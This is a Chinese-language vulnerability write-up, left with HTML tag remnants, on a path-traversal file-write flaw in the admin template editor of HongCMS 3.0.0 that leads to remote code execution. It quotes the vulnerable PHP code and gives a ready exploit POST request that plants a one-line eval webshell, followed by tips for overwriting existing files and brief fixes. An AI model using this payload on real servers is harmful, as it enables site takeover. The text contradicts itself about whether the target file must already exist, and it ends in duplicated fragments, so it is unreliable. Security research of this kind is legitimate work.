HongCMS 3.0.0 远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2>
HongCMS 3.0.0 版本在后台模板管理功能中存在远程代码执行漏洞，攻击者可以通过构造特殊的文件路径参数，实现对服务器上任意PHP文件的写入操作，从而导致远程代码执行。<\/p>

漏洞环境要求<\/h2>

必须完成HongCMS的安装（访问\/install\/index.php进行图形化安装）<\/li>
安装完成后需要删除install目录<\/li>

需要拥有后台管理员账户权限<\/li> <\/ol>

漏洞定位<\/h2>
漏洞存在于后台的模板管理功能中：
`系统->模板管理->模板文件列表<\/code> 中的修改模板功能<\/p>`

漏洞分析<\/h2>
核心漏洞代码<\/h3>
\/admin\/controllers\/tmplate.php<\/code> 中的 save()<\/code> 方法：<\/p>
public<\/span> function<\/span> save<\/span>(){  \/\/保存模板文件
<\/span><\/span><\/span><\/span>    $file =<\/span> ForceStringFrom<\/span>('file'<\/span>);
<\/span><\/span>    $filepath =<\/span> $this-><\/span>temp_path<\/span> .<\/span> $this-><\/span>current_dir<\/span> .<\/span> $file;
<\/span><\/span>
<\/span><\/span>    if<\/span> (is_writable<\/span>($filepath)) {
<\/span><\/span>        $filecontent =<\/span> trim<\/span>($_POST['filecontent'<\/span>]);
<\/span><\/span>        if<\/span> (get_magic_quotes_gpc<\/span>()) {
<\/span><\/span>            $filecontent =<\/span> stripslashes<\/span>($filecontent);
<\/span><\/span>        }
<\/span><\/span>
<\/span><\/span>        $fd =<\/span> fopen<\/span>($filepath, 'wb'<\/span>);
<\/span><\/span>        fputs<\/span>($fd,$filecontent);
<\/span><\/span>
<\/span><\/span>        Success<\/span>('template'<\/span>.<\/span> Iif<\/span>($this-><\/span>current_dir<\/span>, '?dir='<\/span> .<\/span> $this-><\/span>current_dir<\/span>));
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        $errors =<\/span> '模板文件('<\/span>.<\/span>$file.<\/span>')不可写! 请将其属性设置为: 777'<\/span>;
<\/span><\/span>        Error<\/span>($errors, '编辑模板错误'<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键参数分析<\/h3>


$file<\/code> - 通过ForceStringFrom('file')<\/code>获取，直接来自用户输入<\/p>
<\/li>

$filepath<\/code> - 由三部分组成：<\/p>

$this->temp_path<\/code> - 固定为ROOT.'public\/templates\/'<\/code><\/li>
$this->current_dir<\/code> - 通过ForceStringFrom('dir')<\/code>获取，默认为Default\/<\/code><\/li>
$file<\/code> - 用户控制的文件名参数<\/li>
<\/ul>
<\/li>

$filecontent<\/code> - 直接来自$_POST['filecontent']<\/code>，未做严格过滤<\/p>
<\/li>
<\/ol>
漏洞利用原理<\/h3>

通过构造包含路径遍历序列(..\/..\/<\/code>)的file<\/code>参数，可以控制$filepath<\/code>指向任意位置<\/li>
由于$filecontent<\/code>完全可控，可以写入任意PHP代码<\/li>
唯一限制是目标文件必须存在且可写(is_writable()<\/code>检查)<\/li>
<\/ol>
漏洞复现步骤<\/h2>

登录后台管理系统<\/li>
访问模板管理功能：系统->模板管理->模板文件列表<\/code><\/li>
修改任意模板文件并抓包<\/li>
构造恶意请求：<\/li>
<\/ol>
POST \/admin\/index.php\/template\/save HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded

file=..\/..\/..\/..\/shell.php&dir=Default\/&filecontent=<?php @eval($_POST['cmd']);?>
<\/code><\/pre>

如果目标文件存在且可写，将会在网站根目录创建shell.php文件<\/li>
访问http:\/\/target.com\/shell.php<\/code>即可执行任意PHP代码<\/li>
<\/ol>
实际利用技巧<\/h2>

寻找已存在的PHP文件进行覆盖（如\/models\/user.php）<\/li>
构造路径时需要计算正确的..\/<\/code>数量以定位到网站根目录<\/li>
如果默认模板目录不可写，可以尝试其他可写目录<\/li>
<\/ol>
修复建议<\/h2>

对$file<\/code>参数进行严格过滤，禁止路径遍历字符<\/li>
限制文件保存路径在模板目录内<\/li>
对写入内容进行PHP代码检测<\/li>
更新到最新版本（如果官方已修复）<\/li>
<\/ol>
总结<\/h2>
该漏洞属于典型的文件写入导致的远程代码执行漏洞，利用条件是需要后台管理员权限。漏洞成因在于未对用户输入的文件路径进行严格过滤，加上对写入内容没有限制，导致攻击者可以覆盖服务器上的任意PHP文件。对于使用HongCMS 3.0.0版本的用户，建议立即升级或采取临时防护措施。<\/p>

HongCMS 3.0.0 远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2> HongCMS 3.0.0 版本在后台模板管理功能中存在远程代码执行漏洞，攻击者可以通过构造特殊的文件路径参数，实现对服务器上任意PHP文件的写入操作，从而导致远程代码执行。<\/p>

漏洞定位<\/h2> 漏洞存在于后台的模板管理功能中： 系统->模板管理->模板文件列表<\/code> 中的修改模板功能<\/p>

漏洞概述<\/h2>
HongCMS 3.0.0 版本在后台模板管理功能中存在远程代码执行漏洞，攻击者可以通过构造特殊的文件路径参数，实现对服务器上任意PHP文件的写入操作，从而导致远程代码执行。<\/p>

漏洞定位<\/h2>
漏洞存在于后台的模板管理功能中：
`系统->模板管理->模板文件列表<\/code> 中的修改模板功能<\/p>`